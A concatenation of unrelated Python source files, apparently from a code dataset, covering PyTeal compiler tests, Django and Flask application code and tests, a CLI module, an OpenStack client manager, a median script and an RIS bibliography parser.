sub2Impl()-->sub1Impl()-->sub2Impl()" in str(tie) ) def test_resolveSubroutines(): def sub1Impl(a1): return None def sub2Impl(a1, a2): return None def sub3Impl(a1, a2, a3): return None subroutine1 = SubroutineDefinition(sub1Impl, TealType.uint64) subroutine2 = SubroutineDefinition(sub2Impl, TealType.uint64) subroutine3 = SubroutineDefinition(sub3Impl, TealType.none) subroutine1L1Label = LabelReference("l1") subroutine1Ops = [ TealOp(None, Op.store, 0), TealOp(None, Op.load, 0), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bnz, subroutine1L1Label), TealOp(None, Op.load, 0), TealOp(None, Op.int, 1), TealOp(None, Op.minus), TealOp(None, Op.load, 0), TealOp(None, Op.dig, 1), TealOp(None, Op.callsub, subroutine1), TealOp(None, Op.swap), TealOp(None, Op.store, 0), TealOp(None, Op.swap), TealOp(None, Op.pop), TealOp(None, Op.int, 1), TealOp(None, Op.add), TealOp(None, Op.retsub), TealLabel(None, subroutine1L1Label), TealOp(None, Op.load, 255), TealOp(None, Op.retsub), ] subroutine2L1Label = LabelReference("l1") subroutine2Ops = [ TealOp(None, Op.store, 1), TealOp(None, Op.load, 1), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bnz, subroutine2L1Label), TealOp(None, Op.load, 0), TealOp(None, Op.int, 1), TealOp(None, Op.minus), TealOp(None, Op.callsub, subroutine1), TealOp(None, Op.int, 1), TealOp(None, Op.add), TealOp(None, Op.retsub), TealLabel(None, subroutine2L1Label), TealOp(None, Op.int, 1), TealOp(None, Op.retsub), ] subroutine3Ops = [ TealOp(None, Op.callsub, subroutine3), TealOp(None, Op.retsub), ] l1Label = LabelReference("l1") mainOps = [ TealOp(None, Op.int, 1), TealOp(None, Op.store, 255), TealOp(None, Op.txn, "Fee"), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bz, l1Label), TealOp(None, Op.int, 100), TealOp(None, Op.callsub, subroutine1), TealOp(None, Op.return_), TealLabel(None, l1Label), TealOp(None, Op.int, 101), TealOp(None, Op.callsub, subroutine2), TealOp(None, Op.return_), TealOp(None, Op.callsub, subroutine3), ] subroutineMapping = { None: mainOps, subroutine1: subroutine1Ops, subroutine2: subroutine2Ops, subroutine3: subroutine3Ops, } expected = OrderedDict() expected[subroutine1] = "sub1Impl_0" expected[subroutine2] = "sub2Impl_1" expected[subroutine3] = "sub3Impl_2" actual = resolveSubroutines(subroutineMapping) assert actual == expected assert mainOps == [ TealOp(None, Op.int, 1), TealOp(None, Op.store, 255), TealOp(None, Op.txn, "Fee"), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bz, l1Label), TealOp(None, Op.int, 100), TealOp(None, Op.callsub, expected[subroutine1]), TealOp(None, Op.return_), TealLabel(None, l1Label), TealOp(None, Op.int, 101), TealOp(None, Op.callsub, expected[subroutine2]), TealOp(None, Op.return_), TealOp(None, Op.callsub, expected[subroutine3]), ] assert subroutine1Ops == [ TealOp(None, Op.store, 0), TealOp(None, Op.load, 0), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bnz, subroutine1L1Label), TealOp(None, Op.load, 0), TealOp(None, Op.int, 1), TealOp(None, Op.minus), TealOp(None, Op.load, 0), TealOp(None, Op.dig, 1), TealOp(None, Op.callsub, expected[subroutine1]), TealOp(None, Op.swap), TealOp(None, Op.store, 0), TealOp(None, Op.swap), TealOp(None, Op.pop), TealOp(None, Op.int, 1), TealOp(None, Op.add), TealOp(None, Op.retsub), TealLabel(None, subroutine1L1Label), TealOp(None, Op.load, 255), TealOp(None, Op.retsub), ] assert subroutine2Ops == [ TealOp(None, Op.store, 1), TealOp(None, Op.load, 1), TealOp(None, Op.int, 0), TealOp(None, Op.eq), TealOp(None, Op.bnz, subroutine2L1Label), TealOp(None, Op.load, 0), TealOp(None, Op.int, 1), TealOp(None, Op.minus), TealOp(None, Op.callsub, expected[subroutine1]), TealOp(None, Op.int, 1), TealOp(None, Op.add), TealOp(None, Op.retsub), TealLabel(None, subroutine2L1Label), TealOp(None, Op.int, 1), TealOp(None, Op.retsub), ] assert subroutine3Ops == [ TealOp(None, Op.callsub, expected[subroutine3]), TealOp(None, Op.retsub), ]
python
#!/bin/python def opDeterminer(ops): vals = [] for op in ops: if op[0] == 'r': (vals, success) = removeOp(vals, long(op[1])) if not success: print ('Wrong!') continue elif op[0] == 'a': (vals, success) = addOp(vals, long(op[1])) median(vals) def removeOp(vals, toRemove): if toRemove in vals: vals.remove(toRemove) return (vals, True) else: return (vals, False) def addOp(vals, toAdd): newVals = [] success = False for val in vals: if val <= toAdd or success: newVals.append(val) else: newVals.append(toAdd) newVals.append(val) success = True if not success: newVals.append(toAdd) return (newVals, success) def median(vals): size = len(vals) if size: median = 0.5 * (vals[size/2] + vals[(size-1)/2]) else: median = None if not median: print ('Wrong!') elif median.is_integer(): print (int(median)) else: print (median) numOps = int(input()) ops = [] for i in range(numOps): op = raw_input().strip().split(' ') ops.append(op) opDeterminer(ops)
python
import signal, time STATE = 0 def state2(signum, frame): print('state2') signal.signal(signal.SIGHUP, signal.SIG_DFL) def state1(signum, frame): print('state1') signal.signal(signal.SIGHUP, state2) signal.signal(signal.SIGHUP, state1) while STATE < 10: time.sleep(0.01)
python
''' testing models ''' from io import BytesIO from collections import namedtuple import json import pathlib import re from unittest.mock import patch from PIL import Image import responses from django.core.exceptions import ValidationError from django.core.files.base import ContentFile from django.db import models from django.test import TestCase from django.utils import timezone from bookwyrm.models import fields, User class ActivitypubFields(TestCase): ''' overwrites standard model feilds to work with activitypub ''' def test_validate_remote_id(self): ''' should look like a url ''' self.assertIsNone(fields.validate_remote_id( 'http://www.example.com' )) self.assertIsNone(fields.validate_remote_id( 'https://www.example.com' )) self.assertIsNone(fields.validate_remote_id( 'http://example.com/dlfjg-23/x' )) self.assertRaises( ValidationError, fields.validate_remote_id, 'http:/example.com/dlfjg-23/x' ) self.assertRaises( ValidationError, fields.validate_remote_id, 'www.example.com/dlfjg-23/x' ) self.assertRaises( ValidationError, fields.validate_remote_id, 'http://www.example.com/dlfjg 23/x' ) def test_activitypub_field_mixin(self): ''' generic mixin with super basic to and from functionality ''' instance = fields.ActivitypubFieldMixin() self.assertEqual(instance.field_to_activity('fish'), 'fish') self.assertEqual(instance.field_from_activity('fish'), 'fish') self.assertFalse(instance.deduplication_field) instance = fields.ActivitypubFieldMixin( activitypub_wrapper='endpoints', activitypub_field='outbox' ) self.assertEqual( instance.field_to_activity('fish'), {'outbox': 'fish'} ) self.assertEqual( instance.field_from_activity({'outbox': 'fish'}), 'fish' ) self.assertEqual(instance.get_activitypub_field(), 'endpoints') instance = fields.ActivitypubFieldMixin() instance.name = 'snake_case_name' self.assertEqual(instance.get_activitypub_field(), 'snakeCaseName') def test_remote_id_field(self): ''' just sets some defaults on charfield ''' instance = fields.RemoteIdField() self.assertEqual(instance.max_length, 255) self.assertTrue(instance.deduplication_field) with self.assertRaises(ValidationError): instance.run_validators('http://www.example.com/dlfjg 23/x') def test_username_field(self): ''' again, just setting defaults on username field ''' instance = fields.UsernameField() self.assertEqual(instance.activitypub_field, 'preferredUsername') self.assertEqual(instance.max_length, 150) self.assertEqual(instance.unique, True) with self.assertRaises(ValidationError): instance.run_validators('one two') instance.run_validators('a*&') instance.run_validators('trailingwhite ') self.assertIsNone(instance.run_validators('aksdhf')) self.assertEqual(instance.field_to_activity('[email protected]'), 'test') def test_foreign_key(self): ''' should be able to format a related model ''' instance = fields.ForeignKey('User', on_delete=models.CASCADE) Serializable = namedtuple('Serializable', ('to_activity', 'remote_id')) item = Serializable(lambda: {'a': 'b'}, 'https://e.b/c') # returns the remote_id field of the related object self.assertEqual(instance.field_to_activity(item), 'https://e.b/c') @responses.activate def test_foreign_key_from_activity_str(self): ''' create a new object from a foreign key ''' instance = fields.ForeignKey(User, on_delete=models.CASCADE) datafile = pathlib.Path(__file__).parent.joinpath( '../data/ap_user.json') userdata = json.loads(datafile.read_bytes()) # don't try to load the user icon del userdata['icon'] # it shouldn't match with this unrelated user: unrelated_user = User.objects.create_user( 'rat', '[email protected]', 'ratword', local=True) # test receiving an unknown remote id and loading data responses.add( responses.GET, 'https://example.com/user/mouse', json=userdata, status=200) with patch('bookwyrm.models.user.set_remote_server.delay'): value = instance.field_from_activity( 'https://example.com/user/mouse') self.assertIsInstance(value, User) self.assertNotEqual(value, unrelated_user) self.assertEqual(value.remote_id, 'https://example.com/user/mouse') self.assertEqual(value.name, 'MOUSE?? MOUSE!!') def test_foreign_key_from_activity_dict(self): ''' test recieving activity json ''' instance = fields.ForeignKey(User, on_delete=models.CASCADE) datafile = pathlib.Path(__file__).parent.joinpath( '../data/ap_user.json') userdata = json.loads(datafile.read_bytes()) # don't try to load the user icon del userdata['icon'] # it shouldn't match with this unrelated user: unrelated_user = User.objects.create_user( 'rat', '[email protected]', 'ratword', local=True) with patch('bookwyrm.models.user.set_remote_server.delay'): value = instance.field_from_activity(userdata) self.assertIsInstance(value, User) self.assertNotEqual(value, unrelated_user) self.assertEqual(value.remote_id, 'https://example.com/user/mouse') self.assertEqual(value.name, 'MOUSE?? MOUSE!!') # et cetera but we're not testing serializing user json def test_foreign_key_from_activity_dict_existing(self): ''' test receiving a dict of an existing object in the db ''' instance = fields.ForeignKey(User, on_delete=models.CASCADE) datafile = pathlib.Path(__file__).parent.joinpath( '../data/ap_user.json' ) userdata = json.loads(datafile.read_bytes()) user = User.objects.create_user( 'mouse', '[email protected]', 'mouseword', local=True) user.remote_id = 'https://example.com/user/mouse' user.save() User.objects.create_user( 'rat', '[email protected]', 'ratword', local=True) value = instance.field_from_activity(userdata) self.assertEqual(value, user) def test_foreign_key_from_activity_str_existing(self): ''' test receiving a remote id of an existing object in the db ''' instance = fields.ForeignKey(User, on_delete=models.CASCADE) user = User.objects.create_user( 'mouse', '[email protected]', 'mouseword', local=True) User.objects.create_user( 'rat', '[email protected]', 'ratword', local=True) value = instance.field_from_activity(user.remote_id) self.assertEqual(value, user) def test_one_to_one_field(self): ''' a gussied up foreign key ''' instance = fields.OneToOneField('User', on_delete=models.CASCADE) Serializable = namedtuple('Serializable', ('to_activity', 'remote_id')) item = Serializable(lambda: {'a': 'b'}, 'https://e.b/c') self.assertEqual(instance.field_to_activity(item), {'a': 'b'}) def test_many_to_many_field(self): ''' lists! ''' instance = fields.ManyToManyField('User') Serializable = namedtuple('Serializable', ('to_activity', 'remote_id')) Queryset = namedtuple('Queryset', ('all', 'instance')) item = Serializable(lambda: {'a': 'b'}, 'https://e.b/c') another_item = Serializable(lambda: {}, 'example.com') items = Queryset(lambda: [item], another_item) self.assertEqual(instance.field_to_activity(items), ['https://e.b/c']) instance = fields.ManyToManyField('User', link_only=True) instance.name = 'snake_case' self.assertEqual( instance.field_to_activity(items), 'example.com/snake_case' ) @responses.activate def test_many_to_many_field_from_activity(self): ''' resolve related fields for a list, takes a list of remote ids ''' instance = fields.ManyToManyField(User) datafile = pathlib.Path(__file__).parent.joinpath( '../data/ap_user.json' ) userdata = json.loads(datafile.read_bytes()) # don't try to load the user icon del userdata['icon'] # test receiving an unknown remote id and loading data responses.add( responses.GET, 'https://example.com/user/mouse', json=userdata, status=200) with patch('bookwyrm.models.user.set_remote_server.delay'): value = instance.field_from_activity( ['https://example.com/user/mouse', 'bleh'] ) self.assertIsInstance(value, list) self.assertEqual(len(value), 1) self.assertIsInstance(value[0], User) def test_tag_field(self): ''' a special type of many to many field ''' instance = fields.TagField('User') Serializable = namedtuple( 'Serializable', ('to_activity', 'remote_id', 'name_field', 'name') ) Queryset = namedtuple('Queryset', ('all', 'instance')) item = Serializable( lambda: {'a': 'b'}, 'https://e.b/c', 'name', 'Name') another_item = Serializable( lambda: {}, 'example.com', '', '') items = Queryset(lambda: [item], another_item) result = instance.field_to_activity(items) self.assertIsInstance(result, list) self.assertEqual(len(result), 1) self.assertEqual(result[0].href, 'https://e.b/c') self.assertEqual(result[0].name, 'Name') self.assertEqual(result[0].type, 'Serializable') def test_tag_field_from_activity(self): ''' loadin' a list of items from Links ''' # TODO @responses.activate def test_image_field(self): ''' storing images ''' user = User.objects.create_user( 'mouse', '[email protected]', 'mouseword', local=True) image_file = pathlib.Path(__file__).parent.joinpath( '../../static/images/default_avi.jpg') image = Image.open(image_file) output = BytesIO() image.save(output, format=image.format) user.avatar.save( 'test.jpg', ContentFile(output.getvalue()) ) output = fields.image_serializer(user.avatar) self.assertIsNotNone( re.match( r'.*\.jpg', output.url, ) ) self.assertEqual(output.type, 'Image') instance = fields.ImageField() self.assertEqual(instance.field_to_activity(user.avatar), output) responses.add( responses.GET, 'http://www.example.com/image.jpg', body=user.avatar.file.read(), status=200) loaded_image = instance.field_from_activity( 'http://www.example.com/image.jpg') self.assertIsInstance(loaded_image, list) self.assertIsInstance(loaded_image[1], ContentFile) def test_datetime_field(self): ''' this one is pretty simple, it just has to use isoformat ''' instance = fields.DateTimeField() now = timezone.now() self.assertEqual(instance.field_to_activity(now), now.isoformat()) self.assertEqual( instance.field_from_activity(now.isoformat()), now ) self.assertEqual(instance.field_from_activity('bip'), None) def test_array_field(self): ''' idk why it makes them strings but probably for a good reason ''' instance = fields.ArrayField(fields.IntegerField) self.assertEqual(instance.field_to_activity([0, 1]), ['0', '1'])
python
class _Position: def __init__(self, shares, share_price): if share_price <= 0: raise ValueError("Please enter a positive number for share_price") self.shares = shares self.position_size = float(shares * share_price) def buy(self, shares, share_price): if shares < 0 or share_price <= 0: raise ValueError(" Please enter positive numbers for shares and share_price", shares, share_price) if self.shares >= 0: self.shares += shares self.position_size += shares * share_price return float('NaN') else: # covering short position if abs(self.shares) >= shares: profit = (self.position_size / self.shares) * shares - share_price * shares self.position_size += share_price * shares + profit self.shares += shares return profit else: profit = self.position_size - share_price * self.shares self.shares += shares self.position_size += shares * share_price + profit return profit def sell(self, shares, share_price): if shares < 0 or share_price <= 0: raise ValueError(" Please enter positive numbers for shares and share_price") if self.shares <= 0: self.shares -= shares self.position_size -= shares * share_price return float('NaN') else: # covering long position if self.shares >= shares: profit = share_price * shares - (self.position_size / self.shares) * shares self.shares -= shares self.position_size -= shares * share_price - profit return profit else: profit = share_price * self.shares - self.position_size self.shares -= shares self.position_size -= shares * share_price - profit return profit def get_shares(self): return self.shares def to_tuple(self): return self.shares, self.position_size def to_dict(self): return {'shares': self.shares, 'position_size': self.position_size}
python
import io import re from pathlib import Path from zipfile import ZipFile import typer from typer import Option, Argument from patterns.cli.services.lookup import IdLookup from patterns.cli.services.output import sprint, abort_on_error, abort from patterns.cli.services.pull import ( download_graph_zip, download_component_zip, COMPONENT_RE, ) from patterns.configuration.edit import GraphDirectoryEditor, FileOverwriteError _graph_help = "The name of a graph in your Patterns organization [default: directory name]" _graph_version_id_help = ( "The id of the graph version to pull. [default: latest version]" ) _organization_help = "The name of the Patterns organization that the graph was uploaded to" _force_help = "Overwrite existing files without prompting" _directory_help = "The directory to create the new graph in. Must not exist." _component_help = ( "The component version to download (e.g. 'organization/component@v1')." ) def clone( organization: str = Option("", "-o", "--organization", help=_organization_help), graph: str = Option("", help=_graph_help), graph_version_id: str = Option("", "-v", "--version", help=_graph_version_id_help), component: str = Option("", "--component", help=_component_help), directory: Path = Argument(None, exists=False, help=_graph_help), ): """Download the code for a graph""" if not graph and not directory and not component: if graph_version_id: abort( f"Missing graph directory argument." f"\ntry [code]patterns clone -v {graph_version_id} new_graph" ) else: abort( f"Missing graph argument." f"\ntry [code]patterns clone graph-to-clone" ) component_match = COMPONENT_RE.fullmatch(component) if component and not component_match: abort( "Invalid component version. Must be in the form organization/component@v1" ) component_name = component_match.group(2) if component_match else None ids = IdLookup( organization_name=organization, explicit_graph_name=graph or component_name or directory.name, explicit_graph_version_id=graph_version_id, ) if not directory: if component: directory = Path(component_name) elif graph: directory = Path(graph) elif graph_version_id: with abort_on_error("Error"): directory = Path(ids.graph_name) else: abort("Specify --graph, --graph-version-id, or a directory") with abort_on_error("Error cloning graph"): if component: content = download_component_zip(component) else: content = download_graph_zip(ids.graph_version_id) editor = GraphDirectoryEditor(directory, overwrite=False) with ZipFile(io.BytesIO(content), "r") as zf: editor.add_node_from_zip("graph.yml", "graph.yml", zf) sprint(f"[success]Cloned graph into {directory}") _pull_graph_help = "The location of the graph to pull into [default: current directory]" def pull( organization: str = Option("", "-o", "--organization", help=_organization_help), graph_version_id: str = Option("", help=_graph_version_id_help), force: bool = Option(False, "-f", "--force", help=_force_help), graph: Path = Argument(None, exists=True, help=_pull_graph_help), ): """Update the code for the current graph""" ids = IdLookup( organization_name=organization, explicit_graph_version_id=graph_version_id, explicit_graph_path=graph, ) with abort_on_error("Error downloading graph"): b = io.BytesIO(download_graph_zip(ids.graph_version_id)) editor = GraphDirectoryEditor(ids.graph_file_path, overwrite=force) with abort_on_error("Error downloading graph"): try: with ZipFile(b, "r") as zf: editor.add_node_from_zip("graph.yml", "graph.yml", zf) except FileOverwriteError as e: sprint(f"[error]{e}") sprint("[info]Run this command with --force to overwrite local files") raise typer.Exit(1) sprint(f"[success]Pulled graph content")
python
# Copyright (C) 2014, Red Hat, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. """ External event triggering for servers, not to be used by users. """ from novaclient import base class Event(base.Resource): def __repr__(self): return "<Event: %s>" % self.name class ServerExternalEventManager(base.Manager): resource_class = Event def create(self, events): """Create one or more server events. :param:events: A list of dictionaries containing 'server_uuid', 'name', 'status', and 'tag' (which may be absent) """ body = {'events': events} return self._create('/os-server-external-events', body, 'events', return_raw=True)
python
import os from flask import render_template, url_for, flash, redirect,request,abort from blog import app,db,bcrypt from blog.models import User,Post from blog.forms import RegistrationForm, LoginForm,UpdateAccountForm,PostForm from flask_login import login_user,current_user,logout_user,login_required import secrets @app.route("/") @app.route("/home") def home(): posts = Post.query.all() return render_template('home.html', posts=posts) @app.route("/about") def about(): return render_template('about.html', title='About') @app.route("/register", methods=['GET', 'POST']) def register(): if current_user.is_authenticated: return redirect(url_for('home')) form = RegistrationForm() if form.validate_on_submit(): hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8') user = User(username=form.username.data, email = form.email.data, password = hashed_password) db.session.add(user) db.session.commit() flash('Your account has been activated! You can now log in', 'success') return redirect(url_for('login')) return render_template('register.html', title='Register', form=form) @app.route("/login", methods=['GET', 'POST']) def login(): if current_user.is_authenticated: return redirect(url_for('home')) form = LoginForm() if form.validate_on_submit(): user = User.query.filter_by(email=form.email.data).first() if user and bcrypt.check_password_hash(user.password,form.password.data): login_user(user,remember=form.remember.data) next_page = request.args.get('next') return redirect(next_page) if next_page else redirect(url_for('home')) else: flash('Login Unsuccessful. Please check username and password', 'danger') return render_template('login.html', title='Login', form=form) @app.route("/logout") def logout(): logout_user() return redirect(url_for('home')) def save_picture(form_picture): random_hex = secrets.token_hex(8) _,f_ext = os.path.splitext(form_picture.filename) picture_fn = random_hex + f_ext picture_path = os.path.join(app.root_path,'static/photos',picture_fn) form_picture.save(picture_path) return picture_fn @app.route("/account",methods=['GET', 'POST']) @login_required def account(): form = UpdateAccountForm() if form.validate_on_submit(): if form.picture.data: picture_file = save_picture(form.picture.data) current_user.image_file= picture_file current_user.username=form.username.data current_user.email=form.email.data db.session.commit() flash('Account updated','success') return redirect(url_for('account')) elif request.method == 'GET': form.username.data = current_user.username form.email.data = current_user.email image_file = url_for('static',filename='photos/'+ current_user.image_file) return render_template('account.html', title='Account', image_file=image_file,form=form) @app.route("/post/new",methods=['GET', 'POST']) @login_required def new_post(): form = PostForm() if form.validate_on_submit(): post = Post(title=form.title.data, content=form.content.data, author=current_user) db.session.add(post) db.session.commit() flash('Post Created','Success') return redirect(url_for('home')) return render_template('create_post.html', title='New Post', form=form ,legend= 'Update Post') @app.route("/post/<post_id>") def post(post_id): post = Post.query.get_or_404(post_id) return render_template('post.html',title=Post.title,post=post) @app.route("/post/<int:post_id>/update",methods=['GET', 'POST']) @login_required def update_post(post_id): post = Post.query.get_or_404(post_id) if post.author != current_user: abort(403) form = PostForm() if form.validate_on_submit(): post.title = form.title.data post.content = form.content.data db.session.commit() flash('Your post updated','success') return redirect(url_for('post',post_id=post.id)) elif request.method == 'GET': form.title.data = post.title form.content.data = post.content return render_template('create_post.html',title='Update Post',form=form,legend= 'Update Post') @app.route("/post/<int:post_id>/delete",methods=['POST']) @login_required def delete_post(post_id): post = Post.query.get_or_404(post_id) if post.author != current_user: abort(403) db.session.delete(post) db.session.commit() flash('Your post is deleted','Success') return redirect(url_for('home'))
python
import pandas as pd import logging def ris_detect(raw): """ Detect RIS format style. """ if raw.startswith('TY -'): logging.debug('RIS file format detected.') return 'ris' elif raw.startswith('%0'): logging.debug('Endnote file format detected.') return 'endnote' else: logging.debug('RIS format not identified.') raise Exception(f'Data scheme not recognised. Please check file format.\nBeginning of file: "{raw[:20]}"') def ris_parse(ris_file): """ Read RIS file an parse rows and values to list of lists. """ with open(ris_file, 'r', encoding='utf-8-sig') as f: raw = f.read() data_scheme = ris_detect(raw) data = raw.strip() entry_sep = '\n\n' # Use 'ER - ' or '\n\n' as entry separator. line_sep = '\n' # Split data and remove empty rows (Endnote format) documents = [item for item in data.split(entry_sep) if item] table = [[item for item in doc.split(line_sep)] for doc in documents] return table, data_scheme def ris_df(ris_file): """ Extract and return data as DataFrame. """ table, data_scheme = ris_parse(ris_file) # Empty template DataFrame. df = pd.DataFrame(columns=['title', 'abstract', 'source', 'year', 'publisher', 'type'], index = range(len(table))) # Extract relevant data from RIS file table. if data_scheme == 'ris': for n, j in enumerate(table): for i in j: if i.startswith('TI'): df.loc[n]['title'] = i[6:] if i.startswith('AB'): df.loc[n]['abstract'] = i[6:] if i.startswith('T2'): df.loc[n]['source'] = i[6:] if i.startswith('PY'): df.loc[n]['year'] = i[6:] if i.startswith('M3'): df.loc[n]['type'] = i[6:] else: for n, j in enumerate(table): for i in j: if i.startswith('%T'): df.loc[n]['title'] = i[3:] if i.startswith('%X'): df.loc[n]['abstract'] = i[3:] if i.startswith('%B'): df.loc[n]['source'] = i[3:] if i.startswith('%D'): df.loc[n]['year'] = i[3:] if i.startswith('%0'): df.loc[n]['type'] = i[3:] return df
python
import unittest import tethys_gizmos.views.gizmo_showcase as gizmo_showcase from requests.exceptions import ConnectionError from unittest import mock from django.test import RequestFactory from ... import UserFactory class TestGizmoShowcase(unittest.TestCase): def setUp(self): self.user = UserFactory() self.request_factory = RequestFactory() def tearDown(self): pass @mock.patch('tethys_gizmos.views.gizmo_showcase.list_spatial_dataset_engines') def test_get_geoserver_wms(self, mock_list_sdes): endpoint = 'http://localhost:8080/geoserver/rest' expected_endpoint = 'http://localhost:8080/geoserver/wms' mock_sde = mock.MagicMock(type='GEOSERVER', endpoint=endpoint) mock_list_sdes.return_value = [mock_sde] result = gizmo_showcase.get_geoserver_wms() # Check Result self.assertEqual(expected_endpoint, result) @mock.patch('tethys_gizmos.views.gizmo_showcase.list_spatial_dataset_engines') def test_get_geoserver_wms_connection_error(self, mock_list_sdes): # Connection Error Case endpoint = 'http://localhost:8080/geoserver/rest' expected_endpoint = 'http://ciwmap.chpc.utah.edu:8080/geoserver/wms' mock_sde = mock.MagicMock(type='GEOSERVER', endpoint=endpoint) mock_sde.validate.side_effect = ConnectionError mock_list_sdes.return_value = [mock_sde] result = gizmo_showcase.get_geoserver_wms() # Check Result self.assertEqual(expected_endpoint, result) def test_index(self): request = self.request_factory.post('/jobs', {'editable_map_submit': '1', 'geometry': '[100, 40]'}) request.user = self.user result = gizmo_showcase.index(request) self.assertEqual(200, result.status_code) def test_get_kml(self): request = self.request_factory result = gizmo_showcase.get_kml(request) self.assertIn('kml_link', result._container[0].decode()) self.assertEqual(200, result.status_code) def test_swap_kml(self): request = self.request_factory result = gizmo_showcase.swap_kml(request) self.assertIn('.kml', result._container[0].decode()) self.assertEqual(200, result.status_code) def test_swap_overlays(self): request = self.request_factory result = gizmo_showcase.swap_overlays(request) self.assertIn('"type": "GeometryCollection"', result._container[0].decode()) self.assertEqual(200, result.status_code) @mock.patch('tethys_gizmos.views.gizmo_showcase.messages') def test_google_map_view(self, mock_messages): mock_mi = mock_messages.info request = self.request_factory.post('/jobs', {'editable_map_submit': '1', 'geometry': '[100, 40]'}) request.user = self.user # Need this to fix the You cannot add messages without installing # django.contrib.messages.middleware.MessageMiddleware result = gizmo_showcase.google_map_view(request) # Check result mock_mi.assert_called_with(request, '[100, 40]') self.assertEqual(200, result.status_code) @mock.patch('tethys_gizmos.views.gizmo_showcase.messages') def test_map_view(self, mock_messages): mock_mi = mock_messages.info request = self.request_factory.post('/jobs', {'editable_map_submit': '1', 'geometry': '[100, 40]'}) request.user = self.user # Need this to fix the You cannot add messages without installing # django.contrib.messages.middleware.MessageMiddleware result = gizmo_showcase.map_view(request) # Check result mock_mi.assert_called_with(request, '[100, 40]') self.assertEqual(200, result.status_code) def test_esri_map(self): request = self.request_factory.post('/jobs', {'editable_map_submit': '1', 'geometry': '[100, 40]'}) request.user = self.user result = gizmo_showcase.esri_map(request) self.assertEqual(200, result.status_code) def test_jobs_table_result(self): request = self.request_factory.post('/jobs', {'editable_map_submit': '1', 'geometry': '[100, 40]'}) request.user = self.user result = gizmo_showcase.jobs_table_results(request=request, job_id='1') self.assertEqual(302, result.status_code) @mock.patch('tethys_gizmos.views.gizmo_showcase.BasicJob') @mock.patch('tethys_gizmos.views.gizmo_showcase.CondorWorkflow') def test_create_sample_jobs(self, mock_cw, mock_bj): mock_bj().return_value = mock.MagicMock() request = self.request_factory.get('/jobs') request.user = self.user gizmo_showcase.create_sample_jobs(request) # Check BasicJob Call mock_bj.assert_called_with(_status='VCP', description='Completed multi-process job with some errors', label='gizmos_showcase', name='job_8', user=request.user) mock_cw.assert_called_once() mock_cw.assert_called_with(name='job_9', user=request.user, description='Workflow job with multiple nodes.', label='gizmos_showcase', _status='VAR') @mock.patch('tethys_gizmos.views.gizmo_showcase.render') def test_cesium_map_view_home(self, mock_render): request = self.request_factory.get('/jobs') request.user = self.user # Execute gizmo_showcase.cesium_map_view(request, 'home') # Check render render_call_args = mock_render.call_args_list self.assertIn('/developer/gizmos/map_layers/cesium-map-view', render_call_args[0][0][2]['map_layers_link']) self.assertIn('home', render_call_args[0][0][2]['page_type']) self.assertIn('/developer/gizmos/model/cesium-map-view', render_call_args[0][0][2]['model_link']) self.assertIn('/developer/gizmos/home/cesium-map-view', render_call_args[0][0][2]['home_link']) @mock.patch('tethys_gizmos.views.gizmo_showcase.render') def test_cesium_map_view_map_layers(self, mock_render): request = self.request_factory.get('/jobs') request.user = self.user # Execute gizmo_showcase.cesium_map_view(request, 'map_layers') # Check render render_call_args = mock_render.call_args_list self.assertIn('map_layers', render_call_args[0][0][2]['page_type']) @mock.patch('tethys_gizmos.views.gizmo_showcase.render') def test_cesium_map_view_terrain(self, mock_render): request = self.request_factory.get('/jobs') request.user = self.user # Execute gizmo_showcase.cesium_map_view(request, 'terrain') # Check render render_call_args = mock_render.call_args_list self.assertIn('terrain', render_call_args[0][0][2]['page_type']) @mock.patch('tethys_gizmos.views.gizmo_showcase.render') def test_cesium_map_view_czml(self, mock_render): request = self.request_factory.get('/jobs') request.user = self.user # Execute gizmo_showcase.cesium_map_view(request, 'czml') # Check render render_call_args = mock_render.call_args_list self.assertIn('czml', render_call_args[0][0][2]['page_type']) @mock.patch('tethys_gizmos.views.gizmo_showcase.render') def test_cesium_map_view_model(self, mock_render): request = self.request_factory.get('/jobs') request.user = self.user # Execute gizmo_showcase.cesium_map_view(request, 'model') # Check render render_call_args = mock_render.call_args_list self.assertIn('model', render_call_args[0][0][2]['page_type']) self.assertIn('clock', render_call_args[0][0][2]['cesium_map_view']) self.assertIn('globe', render_call_args[0][0][2]['cesium_map_view']) @mock.patch('tethys_gizmos.views.gizmo_showcase.render') def test_cesium_map_view_models(self, mock_render): request = self.request_factory.get('/jobs') request.user = self.user # Execute gizmo_showcase.cesium_map_view(request, 'model2') # Check render render_call_args = mock_render.call_args_list self.assertIn('model2', render_call_args[0][0][2]['page_type']) @mock.patch('tethys_gizmos.views.gizmo_showcase.messages') def test_cesium_map_view_geometry(self, mock_messages): request = self.request_factory.get('/jobs') request.user = self.user mock_post = mock.MagicMock() request.POST = mock_post mock_post.get.return_value = 'test_submitted_geometry' # Execute gizmo_showcase.cesium_map_view(request, 'home') # Check geometry submit mock_post.get.assert_called_with('geometry', None) mock_messages.info.assert_called_with(request, 'test_submitted_geometry') @mock.patch('tethys_gizmos.views.gizmo_showcase.render') @mock.patch('tethys_gizmos.views.gizmo_showcase.JobsTable') @mock.patch('tethys_gizmos.views.gizmo_showcase.TethysJob') def test_jobs_table_demo(self, mock_TethysJob, mock_JobsTable, mock_render): request = self.request_factory.get('/jobs') request.user = self.user result = gizmo_showcase.jobs_table_demo(request) mock_JobsTable.assert_called_with( jobs=mock_TethysJob.objects.filter().order_by().select_subclasses(), column_fields=('id', 'name', 'description', 'creation_time'), hover=True, striped=False, bordered=False, condensed=False, results_url='gizmos:results', refresh_interval=10000, delete_btn=True, show_detailed_status=True ) mock_render.assert_called_with(request, 'tethys_gizmos/gizmo_showcase/jobs_table.html', {'jobs_table': mock_JobsTable()}) self.assertEqual(mock_render(), result)
python
